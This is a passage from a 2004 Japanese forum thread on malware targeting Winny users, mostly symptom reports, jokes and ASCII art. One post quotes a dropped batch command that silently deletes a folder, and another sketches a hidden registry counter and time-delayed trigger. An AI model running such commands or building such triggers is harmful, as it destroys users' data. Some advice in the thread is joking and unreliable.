Ctrl+Alt+Del押したら、出てくるログオン情報のとこに
ユーザー名の前にNOTEBOOK\がついてるだけです。

922 :[名無し]さん(bin+cue).rar:04/11/10 14:38:25 ID:oXsH61Fj
>>912
これっぽい。

http://tmp4.2ch.net/test/read.cgi/download/1099799904/19

923 :[名無し]さん(bin+cue).rar:04/11/10 14:52:05 ID:94lB8wvZ
>>920
晒そうが晒すまいが見つかるのは時間の問題
ウイルスや晒した人間の所為にできるなら感染を装った大暴露祭りになる悪寒

924 :[名無し]さん(bin+cue).rar:04/11/10 15:04:47 ID:R0xVzB3x
>>921
確かにそれはおかしいと思うが、exeを踏んだ覚えはないわけだろ?

仮に新種のウイルスだったとして、仙台のようになにかのファイルに偽装されてたとしたら、
もっと被害者が出て騒ぎになるはず。作者は出来るだけ広範囲にばら撒きたいだろうからな。

しばらく情報収集だな。システムに異変が起きた時に備えて大事なファイルをバックアップ
しておくことをお勧めする。

925 :[名無し]さん(bin+cue).rar:04/11/10 15:18:52 ID:yE+M2f/E
こんなのに引っかかる連中は、どうせバックアップファイル自体にウイルスが混入してるんだろうな。


926 :915:04/11/10 15:33:15 ID:4bi507U7
>>924
サンクス!
念のためにwindows板にも行ってみます。バグってのもありえなくはなさそうなので・・・。

927 :[名無し]さん(bin+cue).rar:04/11/10 15:36:11 ID:AXRT38MY
「新しいバージョンのwinnyノード接続がありました」が
「新しいバージョンのkintamaウイルスがありました」に見える

928 :915:04/11/10 15:40:38 ID:4bi507U7
>>927
ガクガクブルブル・・・・・。
気のせいじゃないかもよ・・・・。(ニヤソ)

929 :[名無し]さん(bin+cue).rar:04/11/10 15:41:02 ID:Zcec9LM7
Cドライブにtask.batというMS-DOSのパッチファイルがあって、
作成日時がちょうど .scrを踏んだ時間あたり。
開いてみたら、同じ階層にあったWINGOというファイルが消えました。
何かやっちゃったんでしょうか?

930 :[名無し]さん(bin+cue).rar:04/11/10 15:46:45 ID:IoqJGwIU
>>929
バッチファイルの中身を晒してくれ。

931 :[名無し]さん(bin+cue).rar:04/11/10 15:51:54 ID:Zcec9LM7
>>930
スキルがないです。

932 :[名無し]さん(bin+cue).rar:04/11/10 15:55:37 ID:CV9QBDec
>>931
.batの中身が晒せないレベルならPCを窓から(ry

933 :[名無し]さん(bin+cue).rar:04/11/10 15:56:15 ID:IoqJGwIU
>>931
バッチファイルを右クリックして「編集」を選んだら、メモ帳で
中身が確認できる。短いようならそのままコピペでよろしく。

934 :[名無し]さん(bin+cue).rar:04/11/10 16:02:51 ID:1vTsbqHZ
一定時間WINNYを起動してるとUPフォルダに適当なファイル(同じハードディスク内のデータ)が
放り込まれてるのですがバスターで検索しても引っかからないです。
EXE踏んだ記憶は無いのですが何か検索or対処法ありますでしょうかOTZ

935 :[名無し]さん(bin+cue).rar:04/11/10 16:07:27 ID:Rjq3LwfO
llllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllllll
lllllllllllllllllllll / ̄ヽllllllllllllllllllllllllllllllllllllll
iiiiiiiiiiiiiiiiiiiiii  あ .iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
iiiiiiiiiiiiiiiiiiiii|  き  |iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
;;;;;;;;;;;;;;;;;;;;;|  ら  |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;;;;;;;;;;;;;;;;;;;;|  め  |;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;:;:;:;:;:;:;:;:;:;:;|  た  |:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:
;:;:;:;:;:;:;:;:;:;:;|  ら  |:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:
:.:.:.:.:.:.:.:.:.:.:ヽ、? /.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:
:. :. :. :. :. :. :. :. ‐‐':. :. :. :. :. :. :. :. :. :. :. :.
: : : : : : : : : : : : : : : : : : : : : : : : ,.‐- 、 : : : :
                  廴ミノ
                 ///¨' 、
                 y':;:;:;:/⌒i!
                J:;:;:;:;};:;:/;},
      ;il||||li'       t`'---‐';:;:;:l
     ,.r'"''、,┘        7;:;:;:;:;:;:;:;「
    ノ4 (⌒i        .}:;:;:;:;:;:;;/
   /..,__彡{, |         `i:;:;:;:;:;}
   (  .ミi!} l、         .」:;:;:丿
  クュ二二`Lっ)        `==='

936 :[名無し]さん(bin+cue).rar:04/11/10 16:08:31 ID:mVMUkzPX
そのAAはヤメレw

937 :[名無し]さん(bin+cue).rar:04/11/10 16:08:47 ID:Zcec9LM7
>>933
RD /S /Q C:\wingo

こんだけでした。

938 :[名無し]さん(bin+cue).rar:04/11/10 16:14:55 ID:yE+M2f/E
ハァ?
RDって単にフォルダを消すだけのコマンドじゃん。
釣り?

939 :[名無し]さん(bin+cue).rar:04/11/10 16:21:39 ID:Zcec9LM7
>>938
マジです。
.scrを踏んだときにもnyのupfolderにsystem32\networkへのpathができて、
ただそんだけだったんですけど。
レジストリの追加やsvchost32.exeみたいなフォルダは出来てなかったかと…。


940 :[名無し]さん(bin+cue).rar:04/11/10 16:50:18 ID:XKb/jEbZ
なんかエロゲも動かしてないしnyも入れてないのにいつの間にか感染してた。
不思議。

941 :[名無し]さん(bin+cue).rar:04/11/10 16:51:36 ID:pSqzF5/r
スレタイ変えて次スレ立てましたが、問題があるようなら削除依頼を出します。

Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/

942 :[名無し]さん(bin+cue).rar:04/11/10 16:52:29 ID:94lB8wvZ
>>941
激しく乙

943 :[名無し]さん(bin+cue).rar:04/11/10 16:53:23 ID:EpgmbXYK
|∀・)・・・コソーリ

944 :[名無し]さん(bin+cue).rar:04/11/10 17:23:42 ID:yNSVRFuf
>>940
電波でも感染するよ

945 :[名無し]さん(bin+cue).rar:04/11/10 17:42:24 ID:34Gr6UG5
違法ファイル落としてるなんて堂々と断言するわけにもいかないので、
みんな何となく何をどうしたのか誤魔化してるから

童貞なのに性病に感染していそうで怖いという話ばかりのように思えるな・・・

946 :[名無し]さん(bin+cue).rar:04/11/10 17:43:34 ID:yNSVRFuf
>>945
童貞でも性病にはなるよ

947 :やさしいひとおしえて:04/11/10 21:20:17 ID:12ZepZ2+
nyでダウンロードしてる途中、買い物にいって帰ってくるとPCが突然再起動。
その後ウインドウズが立ち上がらなくなってしまいました。

●BIOSの画面は出ます。
●再インストールも出来そうです。修復インストはダメ。
●セキュリティソフトはいれてました。ソースネクストの。
●最近作った新しいアカウントでログインしてました。
●SP2でした。
●電源を入れるとHDDにアクセスした途端、文字化けっぽい字(文?)が一行出てそれっきり。
●落としたのは動画ばかり。
●前1時間はファイルの実行などはしていない。
覚えてることを並べてみました。

いろいろ原因を探してみたのですが出てないみたいなので
誰かわかる方がいらっしゃったら教えてください。

948 :[名無し]さん(bin+cue).rar:04/11/10 21:22:47 ID:94lB8wvZ
システムファイルの予期せぬクラッシュ
別HDDにシステム入れてデータを吸い取ろう

949 :[名無し]さん(bin+cue).rar:04/11/10 21:23:54 ID:12ZepZ2+
あ、そうなんですか
素早いレスありがとうございました。

950 :[名無し]さん(bin+cue).rar:04/11/10 21:25:33 ID:vQ0kFlCr
ソースネクストかよw

【Linux】 - KNOPPIX 7
http://pc5.2ch.net/test/read.cgi/linux/1094401227/

Windowsが起動せんでも
これいれればファイルがどうなってるのかぐらいは初心者でもわかるし
LANがあるならデータを転送できる。

ディスクやけないなら本屋でUNIXか/Linux雑誌買えば大抵ついてるしな


951 :[名無し]さん(bin+cue).rar:04/11/10 21:33:18 ID:12ZepZ2+
>950
ありがとうございます。早速やってみます。
>949
お恥ずかしい。フリーよりはいいかなと入れたんですけど、なんだか不安定で困ってました。


952 :[名無し]さん(bin+cue).rar:04/11/10 21:47:40 ID:94lB8wvZ
埋めのつもりでつい答えちまった
反省してさらに埋め

953 :あ!:04/11/10 21:51:48 ID:12ZepZ2+
自分にレスしてしまいました(恥)
同じ方でした。スミマセン。

954 :PPPbf250.kyoto-ip.dti.ne.jp:04/11/10 22:12:21 ID:HQOi9lsO
兄貴画像ください

955 :[名無し]さん(bin+cue).rar:04/11/10 22:23:34 ID:LEUH6BM8
家具屋の奴全然見つかんないorz
仙台ギャラクシーエンジェルズ][俺のデスクトップ].jpg多数とzipが二つくらいしか出てこない。
感染はしてないはずだけど。
エロゲクラスタってクラスタワードをエロゲにするの?
それとも僻地へなんたらにするの?

956 :[名無し]さん(bin+cue).rar:04/11/10 22:32:55 ID:94lB8wvZ
マターリ汁

957 :[名無し]さん(bin+cue).rar:04/11/10 22:35:34 ID:LEUH6BM8
(´・ω・`)は〜い...


958 :[名無し]さん(bin+cue).rar:04/11/10 22:40:20 ID:pWczM8SX
>955
僻地

959 :[名無し]さん(bin+cue).rar:04/11/10 22:47:44 ID:LEUH6BM8
家具屋キタ━ (゚∀゚) ━ ━ ━ ━ ッ!!  
もし特攻してその店潰れたりしたらみんな引く?



960 :[名無し]さん(bin+cue).rar:04/11/10 22:53:18 ID:z245xnFc
さすがに引く

961 :[名無し]さん(bin+cue).rar:04/11/10 22:55:18 ID:LEUH6BM8
じゃあ店長の顔と犯行に使ったと思われるpcだけ見てくる。

962 :[名無し]さん(bin+cue).rar:04/11/10 23:04:29 ID:94lB8wvZ
顧客に情報漏れちくるのがいい所かな

963 :[名無し]さん(bin+cue).rar:04/11/10 23:58:19 ID:yE+M2f/E
近頃、仙台のjpgがバカスカと中継でキャッシュに溜まる。
やばいよこれ。

964 :[名無し]さん(bin+cue).rar:04/11/11 00:19:37 ID:oPQcsSgy
そのままキャッシュで放流してるからおんなじのが何枚もたまってウザい。
おんなじ香具師が時間差で何枚もうpされてるのもあるし。
あれって気がつかないのか、ほかの人の名前をかたってわざと流してるのか・・・


965 :[名無し]さん(bin+cue).rar:04/11/11 00:41:16 ID:3l+7g8sa
肝心の本体の入ったグリーん具りーん2って何なんだろ

966 :[名無し]さん(bin+cue).rar:04/11/11 00:44:30 ID:3l+7g8sa
訂正
仙台の本体が入ったグリーングリーン2はどれだろう

967 :[名無し]さん(bin+cue).rar:04/11/11 01:02:38 ID:oPQcsSgy
この連中は、ここまで来ても金を出して買う気はないっと........ ψ(.. ) メモメモ

968 :[名無し]さん(bin+cue).rar:04/11/11 01:03:56 ID:UM+Ds/HU
>>967
ここまで来てもって言うか、普段からここに居る連中はこんなのに感染してない

969 :[名無し]さん(bin+cue).rar:04/11/11 02:16:08 ID:Cg2ppoPC
Whiter 踏みますた
(´▽`*)アハハ

970 :[名無し]さん(bin+cue).rar:04/11/11 03:43:53 ID:hAY+88Y0
>>954
あぁっ、もうちょっと早く言ってくれれば
今しがた寄って来たビデオ屋で
兄貴なビデオが投売りされてたのに。

971 :[名無し]さん(bin+cue).rar:04/11/11 04:38:14 ID:p/LZakmE
やっぱ参照量のおおいやつはウィルス入ってないみたいだね。
参照量多い順に3・4個落としてみても何とも無かったらしい

972 :[名無し]さん(bin+cue).rar:04/11/11 04:52:45 ID:Md7Vlqn2
>>967
そっ<すの中の人ですか?
すまんて<の中の人ですか?
あるいは?

973 :[名無し]さん(bin+cue).rar:04/11/11 05:35:23 ID:p5LijGEw
1)本来使われるレジストリ位置に便乗して起爆カウンターを設置。10回起動で発動。
2)時限信管を設置。発売日一週間後以降に起動で発動。

どうよ。お試しするだけなら発動しない超両親設計。

974 :[名無し]さん(bin+cue).rar:04/11/11 06:05:59 ID:mAgVWPOH
新スレも立ったことだし

            , '´  ̄ ̄ ` 、
          i r-ー-┬-‐、i
           | |,,_   _,{|
          N| "゚'` {"゚`lリ      埋めないか?
             ト.i   ,__''_  !
          /i/ l\ ー .イ|、
    ,.、-  ̄/  | l   ̄ / | |` ┬-、
    /  ヽ. /    ト-` 、ノ- |  l  l  ヽ.
  /    ∨     l   |!  |   `> |  i
  /     |`二^>  l.  |  | <__,|  |
_|      |.|-<    \ i / ,イ____!/ \
  .|     {.|  ` - 、 ,.---ァ^! |    | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄l
__{   ___|└―ー/  ̄´ |ヽ |___ノ____________|
  }/ -= ヽ__ - 'ヽ   -‐ ,r'゙   l                  |
__f゙// ̄ ̄     _ -'     |_____ ,. -  ̄ \____|
  | |  -  ̄   /   |     _ | ̄ ̄ ̄ ̄ /       \  ̄|
___`\ __ /    _l - ̄  l___ /   , /     ヽi___.|
 ̄ ̄ ̄    |    _ 二 =〒  ̄  } ̄ /     l |      ! ̄ ̄|
_______l       -ヾ ̄  l/         l|       |___|

975 :[名無し]さん(bin+cue).rar:04/11/11 09:24:29 ID:Pu30obRS
さすがに友達が感染すると
笑えんな

976 :[名無し]さん(bin+cue).rar:04/11/11 09:26:37 ID:8J2zKKJv
面白いウィルス出てこねーなぁ

977 :[名無し]さん(bin+cue).rar:04/11/11 10:20:03 ID:LWaaUmF/
>>975
友情なんてシャボン玉

978 :[名無し]さん(bin+cue).rar:04/11/11 10:23:00 ID:gjdT+BPZ
|_∧ 
|∀・,, )親父、生めていいのか? 
|V  ) 
|_|:____| 
|(__) 

次スレ
Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/

979 :[名無し]さん(bin+cue).rar:04/11/11 10:24:09 ID:gjdT+BPZ
てめぇ、漢字間違えてんじゃねーよ
── =≡∧_∧ =!! 
── =≡( ・∀・)  ≡    ガッ     ∧_∧ 
─ =≡○_   ⊂)_=_  \ 从/-=≡ r(    ) 
── =≡ >   __ ノ ))<   >  -= 〉#  つ自分
─ =≡  ( / ≡    /VV\-=≡⊂ 、>> 
── .=≡( ノ =≡           -=  し' 
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| 
                  | 
                  | 
                  | 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜 
                  |       A n t i n n y 湾 


980 :[名無し]さん(bin+cue).rar:04/11/11 10:25:16 ID:gjdT+BPZ
              ☆ チン        マチクタビレタ〜 
                            マチクタビレタ〜 
        ☆ チン  〃  ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ 
          ヽ ___\(\゚Д゚)<>> 埋めてーな(○ `人´ ○) タノンマスー! 
             \_/⊂ ⊂_)_ \____________ 
           / ̄ ̄ ̄ ̄ ̄ ̄ ̄/| 
        |  ̄  ̄ ̄ ̄ ̄ ̄ ̄:| :| 
        |            |/


981 :[名無し]さん(bin+cue).rar:04/11/11 10:31:16 ID:LWaaUmF/
981

982 :[名無し]さん(bin+cue).rar:04/11/11 10:34:31 ID:HShbpvCj
私妊娠したみたいなの

983 :[名無し]さん(bin+cue).rar:04/11/11 10:35:29 ID:HShbpvCj
産め

984 :[名無し]さん(bin+cue).rar:04/11/11 10:36:22 ID:Q6WEXNUm
はいはい。生め

985 :[名無し]さん(bin+cue).rar:04/11/11 10:44:10 ID:gjdT+BPZ
    \ウンコー!/ 
   |   人         ( ( | |\ 
   | ) (__)  .( (   .  ) ) | | .| 
   |_(__)__)___(__| .\| 
  /―( ・∀・ )―(――――-\≒ 
/   /  つ彡          \ 
| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ | 
|______________| 
うめーぞ


986 :[名無し]さん(bin+cue).rar:04/11/11 10:52:23 ID:LWaaUmF/
ウンコが美味くて何故悪い

987 :[名無し]さん(bin+cue).rar:04/11/11 10:55:00 ID:HShbpvCj
ウンコじゃなきゃやだやだ
 〃∩ _, ,_    /)    〃∩ _, ,_    /)
⊂⌒( `Д´)ミ( ⌒ヽつ⊂⌒( `Д´)ミ( ⌒ヽつ
 `ヽ._つ⊂ノ⊂( ,∀、)つ.`ヽ._つ⊂ノ⊂( ,∀、)つ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|     ミ
                            |    〃 ∩  。
                            |   ⊂⌒从ヽ从゜o ドブン
                            | 〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜〜
                            |      肥 溜 め

988 :[名無し]さん(bin+cue).rar:04/11/11 10:56:39 ID:yXRTcJcS
   凵@     ○   ∇ 、,、´`゙;~、  ';冫 ☆
           ┏  ━ゝヽ''人━人━从━〆A!゚━━┓。
 ╋┓"〓┃  < ゝ\',冫。' 、 (__)Ν ; ゛△│´'´,.ゝ'┃.      ●┃ ┃┃
 ┃┃_.━┛ヤ━━━━━━━(__)━━━━━━━━━━  ━┛ ・ ・
        ∇  ┠─Σ-   /,, ・∀・)ウンコー!冫 そ',´; ┨'゚,。
           .。冫▽ <   ⊂     ./⊃     乙  ≧   ▽
         。 ┃   Σ   (⌒ゞ ,l, 、''  │   て く
           ┠─ム┼   ゝ,,ノ ノゝ. 、,,  .┼ ァ Ζ┨ ミo''`
         。、゚`。、   i/   レ' o。了 、'' ×  个o
        ○  ┃   `、,~´+√ ▽   ',!ヽ.◇    o┃
            ┗〆━┷ Z,.' /┷━''o ヾo┷+\━┛,゛;
        警察庁 http://www.npa.go.jp/
  サイバーフォース http://www.cyberpolice.go.jp/
  国家公安委員会 http://www.npsc.go.jp/
        警視庁 http://www.keishicho.metro.tokyo.jp/
     京都府警察 http://www.pref.kyoto.jp/fukei/

989 :[名無し]さん(bin+cue).rar:04/11/11 10:59:20 ID:k7aRSyV9
タスクマネージャが起動できません。
nyで落としたファイル名「偽装解除」と書かれたMS-DOSへのショートカットファイルをダブルクリックしてから
壁紙が勝手に変わったり変な音声が流れたりします。
ウイルス探知にも引っかかりませんし、ウイルスには感染していないと思うのですが、
レジストリ等をいじってタスクマネージャーを使えるようにできないでしょうか?

990 :[名無し]さん(bin+cue).rar:04/11/11 10:59:42 ID:gjdT+BPZ
うんこにはお茶が(/TДT)/あうぅ・・・・

    旦~ 旦~ 旦~ 旦~ 
 旦~     旦~ 旦~ 旦~ 旦~ 旦~ 旦~ ドドドドドド 
     ヽ )ノ     旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 
旦~ ⌒(゚д゚)ノ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 
    /. ( ヽ 旦~ 旦~ 旦~ 旦~ 旦~ 旦~ 
 旦~     旦~ 旦~ 旦~ 旦~ 
     旦~ 旦~ 旦~



991 :[名無し]さん(bin+cue).rar:04/11/11 11:00:09 ID:HShbpvCj
                            //∧_∧  
               (⌒    :(⌒ミ(   //(・∀・#∩ そのウンコよこせ!
               (⌒(⌒(:;;:( ドガッ!!/// ヽ、  _,〈 
           ('⌒;ヾ (⌒"/ li| l ガッガッ!:\从从/ /'ミヽガッ!
            (⌒)y'⌒;ヾ从从(⌒〜∵;)´⌒`()(,;(´(´⌒;"'
           (´⌒ー-   ;:#∧_;/// 彡(:::゜;。(;;;)、⌒从;;ノ・`⌒);
         (´;⌒(´⌒;;' ~ヽと;;;;。#;;、ミ,,:,,;;;ヽ/ノ:#`""^ヾ⌒));
             ̄ ̄(´⌒;,(´, ↑>>988  ゙'';"(´⌒;,(´,(´⌒;)

992 :[名無し]さん(bin+cue).rar:04/11/11 11:01:49 ID:gjdT+BPZ
          ∧_∧ 
        ⊂( ´_ゝ`)つ-、 
      ///   /_/:::::/  1000に向けて待機しとるだろ、おまいらw
      |:::|/ ∩ |:::| /」 
    / ̄ ̄旦 ̄ ̄ ̄/| 
  /______/ | | 
  | |------------| | 

【次スレのアナウンス】
Winnyを狙ったワーム・ウイルス構造解析 Part31
http://tmp4.2ch.net/test/read.cgi/download/1100072614/l50


993 :[名無し]さん(bin+cue).rar:04/11/11 11:02:55 ID:HShbpvCj
                ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                ( ・∀・)< 1000取る計画を練っているから静かにしてくれる?
             _φ___⊂)__ \_______________
           /旦/三/ /|
        | ̄ ̄ ̄ ̄ ̄|  |
        |愛媛みかん|/

994 :[名無し]さん(bin+cue).rar:04/11/11 11:03:03 ID:gjdT+BPZ
    ∧_∧
   ( ´∀`)おしりプリプリ
   /,   つ
  (_(_, )
    しし'
1000取り1000取りヽ( ̄ ̄∇ ̄ ̄)ノ ランラン♪


995 :[名無し]さん(bin+cue).rar:04/11/11 11:03:53 ID:gjdT+BPZ
  ∧_∧ 
 ( ・∀・)もう絶対1000取るのだ!!! 
(( ( ヽ ノ )∧_∧ハゥッ 
  ノ\(○´(Д`; ) 
 (_ノ(_\    つ 
    = ()二)て ヽ ゴッ! 
         w (_) 


996 :[名無し]さん(bin+cue).rar:04/11/11 11:04:54 ID:gjdT+BPZ
\\  ビ    \\  \  \\\  \\ \ \
 \\ \\ ュ    ウ     \\ \ \\
 \\  \\  \\  \ ウ  \\\ \\
 \\\  \\ \∧_∧      ウ  \\ \
  \\  \\  (`Д ´ ∧∧      ゥ\ \\
     \ \   (   (゚Д゚ )  \\ \\ゥ\\
 \  \\   \| | |  ヽ    \\    ゥ
 \\ \ \\  (_(_UU( )〜′ \\  \\
 \  \\ \  | ̄ ̄|     ̄ ̄\ \\ \\
   \ \ \  / Y \  ∨  |   ̄ ̄ ̄ ̄ヽヽ
 \\  \\  |  |  |  \  ヽ
雨にも負けずに1000取り合戦か、頑張ろうな相棒d(^-^)ネ!

997 :[名無し]さん(bin+cue).rar:04/11/11 11:05:16 ID:oRdCSzVv
1000

998 :[名無し]さん(bin+cue).rar:04/11/11 11:05:37 ID:v6TwqGZ0
       _____       _____ 
    /        \  /       \ 「みんなが いうことには、
   /      − 、−、 ヽ/_______  ヽ  ここは日記帳じゃないから、」 
  /     -| /・|・ヽ|- |ノ−、 , ─ \  |  |   
  |   /_ `− ●-′ /⌒)|    |_|___/
.  |   |  _ ̄   | 二 | ⊂ノ | └  |  6 |
  |  |     ̄  | ─ |_/-c`─) )  - ′
  ヽ  |   ̄ ̄  |_) |  |‘┬─(、( /
   ヽ |   /(⌒|\  |  |`-`─- ´ノ^\
    ┝━/  /|~| |━l ヽ__|ヽ./\/ l  |
.    |     / | | |  |/ |       |  |

  「チラシの裏にでも
    書いてろといわれたの。 かわいそうに。」


999 :[名無し]さん(bin+cue).rar:04/11/11 11:05:38 ID:Bg9XYgM/
あらヤダ
千お初だわさ

1000 :[名無し]さん(bin+cue).rar:04/11/11 11:05:43 ID:LWaaUmF/
1000なら新ウィルスくるー

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

246 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)